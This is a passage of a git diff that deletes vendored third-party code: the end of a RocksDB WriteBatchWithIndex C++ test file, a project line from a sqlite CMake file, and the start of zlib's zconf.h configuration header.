-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  assert(s.ok());
-
-  WriteBatchWithIndex batch;
-  ReadOptions read_options;
-  WriteOptions write_options;
-  std::string value;
-
-  s = db->Put(write_options, "a", "a0");
-  ASSERT_OK(s);
-
-  s = db->Put(write_options, "b", "b0");
-  ASSERT_OK(s);
-
-  s = db->Merge(write_options, "b", "b1");
-  ASSERT_OK(s);
-
-  s = db->Merge(write_options, "c", "c0");
-  ASSERT_OK(s);
-
-  s = db->Merge(write_options, "d", "d0");
-  ASSERT_OK(s);
-
-  batch.Merge("a", "a1");
-  batch.Merge("a", "a2");
-  batch.Merge("b", "b2");
-  batch.Merge("d", "d1");
-  batch.Merge("e", "e0");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a0,a1,a2", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "b", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b0,b1,b2", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "c", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c0", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "d", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("d0,d1", value);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e0", value);
-
-  s = db->Delete(write_options, "x");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "x", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  const Snapshot* snapshot = db->GetSnapshot();
-  ReadOptions snapshot_read_options;
-  snapshot_read_options.snapshot = snapshot;
-
-  s = db->Delete(write_options, "a");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a1,a2", value);
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a0,a1,a2", value);
-
-  batch.Delete("a");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "a", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "a", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  s = db->Merge(write_options, "c", "c1");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "c", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c0,c1", value);
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "c", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c0", value);
-
-  s = db->Put(write_options, "e", "e1");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e1,e0", value);
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e0", value);
-
-  s = db->Delete(write_options, "e");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e0", value);
-
-  s = batch.GetFromBatchAndDB(db, snapshot_read_options, "e", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("e0", value);
-
-  db->ReleaseSnapshot(snapshot);
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-TEST_F(WriteBatchWithIndexTest, TestGetFromBatchAndDBMerge2) {
-  DB* db;
-  Options options;
-
-  options.create_if_missing = true;
-  std::string dbname = test::TmpDir() + "/write_batch_with_index_test";
-
-  options.merge_operator = MergeOperators::CreateFromStringId("stringappend");
-
-  DestroyDB(dbname, options);
-  Status s = DB::Open(options, dbname, &db);
-  assert(s.ok());
-
-  // Test batch with overwrite_key=true
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-
-  ReadOptions read_options;
-  WriteOptions write_options;
-  std::string value;
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  batch.Merge("A", "xxx");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Merge("A", "yyy");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  s = db->Put(write_options, "A", "a0");
-  ASSERT_OK(s);
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsMergeInProgress());
-
-  batch.Delete("A");
-
-  s = batch.GetFromBatchAndDB(db, read_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-void AssertKey(std::string key, WBWIIterator* iter) {
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(key, iter->Entry().key.ToString());
-}
-
-void AssertValue(std::string value, WBWIIterator* iter) {
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value, iter->Entry().value.ToString());
-}
-
-// Tests that we can write to the WBWI while we iterate (from a single thread).
-// iteration should see the newest writes
-TEST_F(WriteBatchWithIndexTest, MutateWhileIteratingCorrectnessTest) {
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-  for (char c = 'a'; c <= 'z'; ++c) {
-    batch.Put(std::string(1, c), std::string(1, c));
-  }
-
-  std::unique_ptr<WBWIIterator> iter(batch.NewIterator());
-  iter->Seek("k");
-  AssertKey("k", iter.get());
-  iter->Next();
-  AssertKey("l", iter.get());
-  batch.Put("ab", "cc");
-  iter->Next();
-  AssertKey("m", iter.get());
-  batch.Put("mm", "kk");
-  iter->Next();
-  AssertKey("mm", iter.get());
-  AssertValue("kk", iter.get());
-  batch.Delete("mm");
-
-  iter->Next();
-  AssertKey("n", iter.get());
-  iter->Prev();
-  AssertKey("mm", iter.get());
-  ASSERT_EQ(kDeleteRecord, iter->Entry().type);
-
-  iter->Seek("ab");
-  AssertKey("ab", iter.get());
-  batch.Delete("x");
-  iter->Seek("x");
-  AssertKey("x", iter.get());
-  ASSERT_EQ(kDeleteRecord, iter->Entry().type);
-  iter->Prev();
-  AssertKey("w", iter.get());
-}
-
-void AssertIterKey(std::string key, Iterator* iter) {
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(key, iter->key().ToString());
-}
-
-void AssertIterValue(std::string value, Iterator* iter) {
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(value, iter->value().ToString());
-}
-
-// same thing as above, but testing IteratorWithBase
-TEST_F(WriteBatchWithIndexTest, MutateWhileIteratingBaseCorrectnessTest) {
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-  for (char c = 'a'; c <= 'z'; ++c) {
-    batch.Put(std::string(1, c), std::string(1, c));
-  }
-
-  KVMap map;
-  map["aa"] = "aa";
-  map["cc"] = "cc";
-  map["ee"] = "ee";
-  map["em"] = "me";
-
-  std::unique_ptr<Iterator> iter(
-      batch.NewIteratorWithBase(new KVIter(&map)));
-  iter->Seek("k");
-  AssertIterKey("k", iter.get());
-  iter->Next();
-  AssertIterKey("l", iter.get());
-  batch.Put("ab", "cc");
-  iter->Next();
-  AssertIterKey("m", iter.get());
-  batch.Put("mm", "kk");
-  iter->Next();
-  AssertIterKey("mm", iter.get());
-  AssertIterValue("kk", iter.get());
-  batch.Delete("mm");
-  iter->Next();
-  AssertIterKey("n", iter.get());
-  iter->Prev();
-  // "mm" is deleted, so we're back at "m"
-  AssertIterKey("m", iter.get());
-
-  iter->Seek("ab");
-  AssertIterKey("ab", iter.get());
-  iter->Prev();
-  AssertIterKey("aa", iter.get());
-  iter->Prev();
-  AssertIterKey("a", iter.get());
-  batch.Delete("aa");
-  iter->Next();
-  AssertIterKey("ab", iter.get());
-  iter->Prev();
-  AssertIterKey("a", iter.get());
-
-  batch.Delete("x");
-  iter->Seek("x");
-  AssertIterKey("y", iter.get());
-  iter->Next();
-  AssertIterKey("z", iter.get());
-  iter->Prev();
-  iter->Prev();
-  AssertIterKey("w", iter.get());
-
-  batch.Delete("e");
-  iter->Seek("e");
-  AssertIterKey("ee", iter.get());
-  AssertIterValue("ee", iter.get());
-  batch.Put("ee", "xx");
-  // still the same value
-  AssertIterValue("ee", iter.get());
-  iter->Next();
-  AssertIterKey("em", iter.get());
-  iter->Prev();
-  // new value
-  AssertIterValue("xx", iter.get());
-}
-
-// stress testing mutations with IteratorWithBase
-TEST_F(WriteBatchWithIndexTest, MutateWhileIteratingBaseStressTest) {
-  WriteBatchWithIndex batch(BytewiseComparator(), 0, true);
-  for (char c = 'a'; c <= 'z'; ++c) {
-    batch.Put(std::string(1, c), std::string(1, c));
-  }
-
-  KVMap map;
-  for (char c = 'a'; c <= 'z'; ++c) {
-    map[std::string(2, c)] = std::string(2, c);
-  }
-
-  std::unique_ptr<Iterator> iter(
-      batch.NewIteratorWithBase(new KVIter(&map)));
-
-  Random rnd(301);
-  for (int i = 0; i < 1000000; ++i) {
-    int random = rnd.Uniform(8);
-    char c = static_cast<char>(rnd.Uniform(26) + 'a');
-    switch (random) {
-      case 0:
-        batch.Put(std::string(1, c), "xxx");
-        break;
-      case 1:
-        batch.Put(std::string(2, c), "xxx");
-        break;
-      case 2:
-        batch.Delete(std::string(1, c));
-        break;
-      case 3:
-        batch.Delete(std::string(2, c));
-        break;
-      case 4:
-        iter->Seek(std::string(1, c));
-        break;
-      case 5:
-        iter->Seek(std::string(2, c));
-        break;
-      case 6:
-        if (iter->Valid()) {
-          iter->Next();
-        }
-        break;
-      case 7:
-        if (iter->Valid()) {
-          iter->Prev();
-        }
-        break;
-      default:
-        assert(false);
-    }
-  }
-}
-
-static std::string PrintContents(WriteBatchWithIndex* batch,
-                                 ColumnFamilyHandle* column_family) {
-  std::string result;
-
-  WBWIIterator* iter;
-  if (column_family == nullptr) {
-    iter = batch->NewIterator();
-  } else {
-    iter = batch->NewIterator(column_family);
-  }
-
-  iter->SeekToFirst();
-  while (iter->Valid()) {
-    WriteEntry e = iter->Entry();
-
-    if (e.type == kPutRecord) {
-      result.append("PUT(");
-      result.append(e.key.ToString());
-      result.append("):");
-      result.append(e.value.ToString());
-    } else if (e.type == kMergeRecord) {
-      result.append("MERGE(");
-      result.append(e.key.ToString());
-      result.append("):");
-      result.append(e.value.ToString());
-    } else if (e.type == kSingleDeleteRecord) {
-      result.append("SINGLE-DEL(");
-      result.append(e.key.ToString());
-      result.append(")");
-    } else {
-      assert(e.type == kDeleteRecord);
-      result.append("DEL(");
-      result.append(e.key.ToString());
-      result.append(")");
-    }
-
-    result.append(",");
-    iter->Next();
-  }
-
-  delete iter;
-  return result;
-}
-
-static std::string PrintContents(WriteBatchWithIndex* batch, KVMap* base_map,
-                                 ColumnFamilyHandle* column_family) {
-  std::string result;
-
-  Iterator* iter;
-  if (column_family == nullptr) {
-    iter = batch->NewIteratorWithBase(new KVIter(base_map));
-  } else {
-    iter = batch->NewIteratorWithBase(column_family, new KVIter(base_map));
-  }
-
-  iter->SeekToFirst();
-  while (iter->Valid()) {
-    assert(iter->status().ok());
-
-    Slice key = iter->key();
-    Slice value = iter->value();
-
-    result.append(key.ToString());
-    result.append(":");
-    result.append(value.ToString());
-    result.append(",");
-
-    iter->Next();
-  }
-
-  delete iter;
-  return result;
-}
-
-TEST_F(WriteBatchWithIndexTest, SavePointTest) {
-  WriteBatchWithIndex batch;
-  ColumnFamilyHandleImplDummy cf1(1, BytewiseComparator());
-  Status s;
-
-  batch.Put("A", "a");
-  batch.Put("B", "b");
-  batch.Put("A", "aa");
-  batch.Put(&cf1, "A", "a1");
-  batch.Delete(&cf1, "B");
-  batch.Put(&cf1, "C", "c1");
-  batch.Put(&cf1, "E", "e1");
-
-  batch.SetSavePoint();  // 1
-
-  batch.Put("C", "cc");
-  batch.Put("B", "bb");
-  batch.Delete("A");
-  batch.Put(&cf1, "B", "b1");
-  batch.Delete(&cf1, "A");
-  batch.SingleDelete(&cf1, "E");
-  batch.SetSavePoint();  // 2
-
-  batch.Put("A", "aaa");
-  batch.Put("A", "xxx");
-  batch.Delete("B");
-  batch.Put(&cf1, "B", "b2");
-  batch.Delete(&cf1, "C");
-  batch.SetSavePoint();  // 3
-  batch.SetSavePoint();  // 4
-  batch.SingleDelete("D");
-  batch.Delete(&cf1, "D");
-  batch.Delete(&cf1, "E");
-
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):aa,DEL(A),PUT(A):aaa,PUT(A):xxx,PUT(B):b,PUT(B):bb,DEL("
-      "B)"
-      ",PUT(C):cc,SINGLE-DEL(D),",
-      PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(B):b2,PUT(C):c1,DEL(C),"
-      "DEL(D),PUT(E):e1,SINGLE-DEL(E),DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 4
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):aa,DEL(A),PUT(A):aaa,PUT(A):xxx,PUT(B):b,PUT(B):bb,DEL("
-      "B)"
-      ",PUT(C):cc,",
-      PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(B):b2,PUT(C):c1,DEL(C),"
-      "PUT(E):e1,SINGLE-DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 3
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):aa,DEL(A),PUT(A):aaa,PUT(A):xxx,PUT(B):b,PUT(B):bb,DEL("
-      "B)"
-      ",PUT(C):cc,",
-      PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(B):b2,PUT(C):c1,DEL(C),"
-      "PUT(E):e1,SINGLE-DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 2
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,DEL(A),PUT(B):b,PUT(B):bb,PUT(C):cc,",
-            PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(C):c1,"
-      "PUT(E):e1,SINGLE-DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  batch.SetSavePoint();  // 5
-  batch.Put("X", "x");
-
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,DEL(A),PUT(B):b,PUT(B):bb,PUT(C):cc,PUT(X):x,",
-            PrintContents(&batch, nullptr));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 5
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,DEL(A),PUT(B):b,PUT(B):bb,PUT(C):cc,",
-            PrintContents(&batch, nullptr));
-
-  ASSERT_EQ(
-      "PUT(A):a1,DEL(A),DEL(B),PUT(B):b1,PUT(C):c1,"
-      "PUT(E):e1,SINGLE-DEL(E),",
-      PrintContents(&batch, &cf1));
-
-  ASSERT_OK(batch.RollbackToSavePoint());  // rollback to 1
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,PUT(B):b,", PrintContents(&batch, nullptr));
-
-  ASSERT_EQ("PUT(A):a1,DEL(B),PUT(C):c1,PUT(E):e1,",
-            PrintContents(&batch, &cf1));
-
-  s = batch.RollbackToSavePoint();  // no savepoint found
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("PUT(A):a,PUT(A):aa,PUT(B):b,", PrintContents(&batch, nullptr));
-
-  ASSERT_EQ("PUT(A):a1,DEL(B),PUT(C):c1,PUT(E):e1,",
-            PrintContents(&batch, &cf1));
-
-  batch.SetSavePoint();  // 6
-
-  batch.Clear();
-  ASSERT_EQ("", PrintContents(&batch, nullptr));
-  ASSERT_EQ("", PrintContents(&batch, &cf1));
-
-  s = batch.RollbackToSavePoint();  // rollback to 6
-  ASSERT_TRUE(s.IsNotFound());
-}
-
-TEST_F(WriteBatchWithIndexTest, SingleDeleteTest) {
-  WriteBatchWithIndex batch;
-  Status s;
-  std::string value;
-  DBOptions db_options;
-
-  batch.SingleDelete("A");
-
-  s = batch.GetFromBatch(db_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  value = PrintContents(&batch, nullptr);
-  ASSERT_EQ("SINGLE-DEL(A),", value);
-
-  batch.Clear();
-  batch.Put("A", "a");
-  batch.Put("A", "a2");
-  batch.Put("B", "b");
-  batch.SingleDelete("A");
-
-  s = batch.GetFromBatch(db_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b", value);
-
-  value = PrintContents(&batch, nullptr);
-  ASSERT_EQ("PUT(A):a,PUT(A):a2,SINGLE-DEL(A),PUT(B):b,", value);
-
-  batch.Put("C", "c");
-  batch.Put("A", "a3");
-  batch.Delete("B");
-  batch.SingleDelete("B");
-  batch.SingleDelete("C");
-
-  s = batch.GetFromBatch(db_options, "A", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("a3", value);
-  s = batch.GetFromBatch(db_options, "B", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "C", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  value = PrintContents(&batch, nullptr);
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):a2,SINGLE-DEL(A),PUT(A):a3,PUT(B):b,DEL(B),SINGLE-DEL(B)"
-      ",PUT(C):c,SINGLE-DEL(C),",
-      value);
-
-  batch.Put("B", "b4");
-  batch.Put("C", "c4");
-  batch.Put("D", "d4");
-  batch.SingleDelete("D");
-  batch.SingleDelete("D");
-  batch.Delete("A");
-
-  s = batch.GetFromBatch(db_options, "A", &value);
-  ASSERT_TRUE(s.IsNotFound());
-  s = batch.GetFromBatch(db_options, "B", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("b4", value);
-  s = batch.GetFromBatch(db_options, "C", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("c4", value);
-  s = batch.GetFromBatch(db_options, "D", &value);
-  ASSERT_TRUE(s.IsNotFound());
-
-  value = PrintContents(&batch, nullptr);
-  ASSERT_EQ(
-      "PUT(A):a,PUT(A):a2,SINGLE-DEL(A),PUT(A):a3,DEL(A),PUT(B):b,DEL(B),"
-      "SINGLE-DEL(B),PUT(B):b4,PUT(C):c,SINGLE-DEL(C),PUT(C):c4,PUT(D):d4,"
-      "SINGLE-DEL(D),SINGLE-DEL(D),",
-      value);
-}
-
-TEST_F(WriteBatchWithIndexTest, SingleDeleteDeltaIterTest) {
-  Status s;
-  std::string value;
-  DBOptions db_options;
-  WriteBatchWithIndex batch(BytewiseComparator(), 20, true /* overwrite_key */);
-  batch.Put("A", "a");
-  batch.Put("A", "a2");
-  batch.Put("B", "b");
-  batch.SingleDelete("A");
-  batch.Delete("B");
-
-  KVMap map;
-  value = PrintContents(&batch, &map, nullptr);
-  ASSERT_EQ("", value);
-
-  map["A"] = "aa";
-  map["C"] = "cc";
-  map["D"] = "dd";
-
-  batch.SingleDelete("B");
-  batch.SingleDelete("C");
-  batch.SingleDelete("Z");
-
-  value = PrintContents(&batch, &map, nullptr);
-  ASSERT_EQ("D:dd,", value);
-
-  batch.Put("A", "a3");
-  batch.Put("B", "b3");
-  batch.SingleDelete("A");
-  batch.SingleDelete("A");
-  batch.SingleDelete("D");
-  batch.SingleDelete("D");
-  batch.Delete("D");
-
-  map["E"] = "ee";
-
-  value = PrintContents(&batch, &map, nullptr);
-  ASSERT_EQ("B:b3,E:ee,", value);
-}
-
-}  // namespace
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main() {
-  fprintf(stderr, "SKIPPED\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/sqlite/CMakeLists.txt b/thirdparty/sqlite/CMakeLists.txt
index 9de5ccf..c67d991 100644
--- a/thirdparty/sqlite/CMakeLists.txt
+++ b/thirdparty/sqlite/CMakeLists.txt
@@ -17,6 +17,4 @@
 # under the License.
 #
 
-project(sqlite VERSION 3.22.0 LANGUAGES CXX)
-
 add_library(sqlite sqlite3.c)
diff --git a/thirdparty/zlib/include/zconf.h b/thirdparty/zlib/include/zconf.h
deleted file mode 100644
index a5e3452..0000000
--- a/thirdparty/zlib/include/zconf.h
+++ /dev/null
@@ -1,536 +0,0 @@
-/* zconf.h -- configuration of the zlib compression library
- * Copyright (C) 1995-2016 Jean-loup Gailly, Mark Adler
- * For conditions of distribution and use, see copyright notice in zlib.h
- */
-
-/* @(#) $Id$ */
-
-#ifndef ZCONF_H
-#define ZCONF_H
-/* #undef Z_PREFIX */
-#define Z_HAVE_UNISTD_H
-
-/*
- * If you *really* need a unique prefix for all types and library functions,
- * compile with -DZ_PREFIX. The "standard" zlib should be compiled without it.
- * Even better than compiling with -DZ_PREFIX would be to use configure to set
- * this permanently in zconf.h using "./configure --zprefix".
- */
-#ifdef Z_PREFIX     /* may be set to #if 1 by ./configure */
-#  define Z_PREFIX_SET
-
-/* all linked symbols and init macros */
-#  define _dist_code            z__dist_code
-#  define _length_code          z__length_code
-#  define _tr_align             z__tr_align
-#  define _tr_flush_bits        z__tr_flush_bits
-#  define _tr_flush_block       z__tr_flush_block
-#  define _tr_init              z__tr_init
-#  define _tr_stored_block      z__tr_stored_block
-#  define _tr_tally             z__tr_tally
-#  define adler32               z_adler32
-#  define adler32_combine       z_adler32_combine
-#  define adler32_combine64     z_adler32_combine64
-#  define adler32_z             z_adler32_z
-#  ifndef Z_SOLO
-#    define compress              z_compress
-#    define compress2             z_compress2
-#    define compressBound         z_compressBound
-#  endif
-#  define crc32                 z_crc32
-#  define crc32_combine         z_crc32_combine
-#  define crc32_combine64       z_crc32_combine64
-#  define crc32_z               z_crc32_z
-#  define deflate               z_deflate
-#  define deflateBound          z_deflateBound
-#  define deflateCopy           z_deflateCopy
-#  define deflateEnd            z_deflateEnd
-#  define deflateGetDictionary  z_deflateGetDictionary
-#  define deflateInit           z_deflateInit
-#  define deflateInit2          z_deflateInit2
-#  define deflateInit2_         z_deflateInit2_
-#  define deflateInit_          z_deflateInit_
-#  define deflateParams         z_deflateParams
-#  define deflatePending        z_deflatePending
-#  define deflatePrime          z_deflatePrime
-#  define deflateReset          z_deflateReset
-#  define deflateResetKeep      z_deflateResetKeep
-#  define deflateSetDictionary  z_deflateSetDictionary
-#  define deflateSetHeader      z_deflateSetHeader
-#  define deflateTune           z_deflateTune
-#  define deflate_copyright     z_deflate_copyright
-#  define get_crc_table         z_get_crc_table
-#  ifndef Z_SOLO
-#    define gz_error              z_gz_error
-#    define gz_intmax             z_gz_intmax
-#    define gz_strwinerror        z_gz_strwinerror
-#    define gzbuffer              z_gzbuffer
-#    define gzclearerr            z_gzclearerr
-#    define gzclose               z_gzclose
-#    define gzclose_r             z_gzclose_r
-#    define gzclose_w             z_gzclose_w
-#    define gzdirect              z_gzdirect
-#    define gzdopen               z_gzdopen
-#    define gzeof                 z_gzeof
-#    define gzerror               z_gzerror
-#    define gzflush               z_gzflush
-#    define gzfread               z_gzfread
-#    define gzfwrite              z_gzfwrite
-#    define gzgetc                z_gzgetc
-#    define gzgetc_               z_gzgetc_
-#    define gzgets                z_gzgets
-#    define gzoffset              z_gzoffset
-#    define gzoffset64            z_gzoffset64
-#    define gzopen                z_gzopen
-#    define gzopen64              z_gzopen64
-#    ifdef _WIN32
-#      define gzopen_w              z_gzopen_w
-#    endif
-#    define gzprintf              z_gzprintf
-#    define gzputc                z_gzputc
-#    define gzputs                z_gzputs
-#    define gzread                z_gzread
-#    define gzrewind              z_gzrewind
-#    define gzseek                z_gzseek
-#    define gzseek64              z_gzseek64
-#    define gzsetparams           z_gzsetparams
-#    define gztell                z_gztell
-#    define gztell64              z_gztell64
-#    define gzungetc              z_gzungetc
-#    define gzvprintf             z_gzvprintf
-#    define gzwrite               z_gzwrite
-#  endif
-#  define inflate               z_inflate
-#  define inflateBack           z_inflateBack
-#  define inflateBackEnd        z_inflateBackEnd
-#  define inflateBackInit       z_inflateBackInit
-#  define inflateBackInit_      z_inflateBackInit_
-#  define inflateCodesUsed      z_inflateCodesUsed
-#  define inflateCopy           z_inflateCopy
-#  define inflateEnd            z_inflateEnd
-#  define inflateGetDictionary  z_inflateGetDictionary
-#  define inflateGetHeader      z_inflateGetHeader
-#  define inflateInit           z_inflateInit
-#  define inflateInit2          z_inflateInit2
-#  define inflateInit2_         z_inflateInit2_
-#  define inflateInit_          z_inflateInit_
-#  define inflateMark           z_inflateMark
-#  define inflatePrime          z_inflatePrime
-#  define inflateReset          z_inflateReset
-#  define inflateReset2         z_inflateReset2
-#  define inflateResetKeep      z_inflateResetKeep
-#  define inflateSetDictionary  z_inflateSetDictionary
-#  define inflateSync           z_inflateSync
-#  define inflateSyncPoint      z_inflateSyncPoint
-#  define inflateUndermine      z_inflateUndermine
-#  define inflateValidate       z_inflateValidate
-#  define inflate_copyright     z_inflate_copyright
-#  define inflate_fast          z_inflate_fast
-#  define inflate_table         z_inflate_table
-#  ifndef Z_SOLO
-#    define uncompress            z_uncompress
-#    define uncompress2           z_uncompress2
-#  endif
-#  define zError                z_zError
-#  ifndef Z_SOLO
-#    define zcalloc               z_zcalloc
-#    define zcfree                z_zcfree
-#  endif
-#  define zlibCompileFlags      z_zlibCompileFlags
-#  define zlibVersion           z_zlibVersion
-
-/* all zlib typedefs in zlib.h and zconf.h */
-#  define Byte                  z_Byte
-#  define Bytef                 z_Bytef
-#  define alloc_func            z_alloc_func
-#  define charf                 z_charf
-#  define free_func             z_free_func
-#  ifndef Z_SOLO
-#    define gzFile                z_gzFile
-#  endif
-#  define gz_header             z_gz_header
-#  define gz_headerp            z_gz_headerp
-#  define in_func               z_in_func
-#  define intf                  z_intf
-#  define out_func              z_out_func
-#  define uInt                  z_uInt
-#  define uIntf                 z_uIntf
-#  define uLong                 z_uLong
-#  define uLongf                z_uLongf
-#  define voidp                 z_voidp
-#  define voidpc                z_voidpc
-#  define voidpf                z_voidpf
-
-/* all zlib structs in zlib.h and zconf.h */
-#  define gz_header_s           z_gz_header_s
-#  define internal_state        z_internal_state
-
-#endif
-
-#if defined(__MSDOS__) && !defined(MSDOS)
-#  define MSDOS
-#endif
-#if (defined(OS_2) || defined(__OS2__)) && !defined(OS2)
-#  define OS2
-#endif
-#if defined(_WINDOWS) && !defined(WINDOWS)
-#  define WINDOWS
-#endif
-#if defined(_WIN32) || defined(_WIN32_WCE) || defined(__WIN32__)
-#  ifndef WIN32
-#    define WIN32
-#  endif
-#endif
-#if (defined(MSDOS) || defined(OS2) || defined(WINDOWS)) && !defined(WIN32)
-#  if !defined(__GNUC__) && !defined(__FLAT__) && !defined(__386__)
-#    ifndef SYS16BIT
-#      define SYS16BIT
-#    endif
-#  endif
-#endif
-
-/*
- * Compile with -DMAXSEG_64K if the alloc function cannot allocate more
- * than 64k bytes at a time (needed on systems with 16-bit int).
- */
-#ifdef SYS16BIT
-#  define MAXSEG_64K
-#endif
-#ifdef MSDOS
-#  define UNALIGNED_OK
-#endif
-
-#ifdef __STDC_VERSION__
-#  ifndef STDC
-#    define STDC
-#  endif
-#  if __STDC_VERSION__ >= 199901L
-#    ifndef STDC99
-#      define STDC99
-#    endif
-#  endif
-#endif
-#if !defined(STDC) && (defined(__STDC__) || defined(__cplusplus))
-#  define STDC
-#endif
-#if !defined(STDC) && (defined(__GNUC__) || defined(__BORLANDC__))
-#  define STDC
-#endif
-#if !defined(STDC) && (defined(MSDOS) || defined(WINDOWS) || defined(WIN32))
-#  define STDC
-#endif
-#if !defined(STDC) && (defined(OS2) || defined(__HOS_AIX__))
-#  define STDC
-#endif
-
-#if defined(__OS400__) && !defined(STDC)    /* iSeries (formerly AS/400). */
-#  define STDC
-#endif
-
-#ifndef STDC
-#  ifndef const /* cannot use !defined(STDC) && !defined(const) on Mac */
-#    define const       /* note: need a more gentle solution here */
-#  endif
-#endif
-
-#if defined(ZLIB_CONST) && !defined(z_const)
-#  define z_const const
-#else
-#  define z_const
-#endif
-
-#ifdef Z_SOLO
-   typedef unsigned long z_size_t;
-#else
-#  define z_longlong long long
-#  if defined(NO_SIZE_T)
-     typedef unsigned NO_SIZE_T z_size_t;
-#  elif defined(STDC)
-#    include <stddef.h>
-     typedef size_t z_size_t;
-#  else
-     typedef unsigned long z_size_t;
-#  endif
-#  undef z_longlong
-#endif
-
-/* Maximum value for memLevel in deflateInit2 */
-#ifndef MAX_MEM_LEVEL
-#  ifdef MAXSEG_64K
-#    define MAX_MEM_LEVEL 8
-#  else
-#    define MAX_MEM_LEVEL 9
-#  endif
-#endif
-
-/* Maximum value for windowBits in deflateInit2 and inflateInit2.
- * WARNING: reducing MAX_WBITS makes minigzip unable to extract .gz files
- * created by gzip. (Files created by minigzip can still be extracted by
- * gzip.)
- */
-#ifndef MAX_WBITS
-#  define MAX_WBITS   15 /* 32K LZ77 window */
-#endif
-
-/* The memory requirements for deflate are (in bytes):
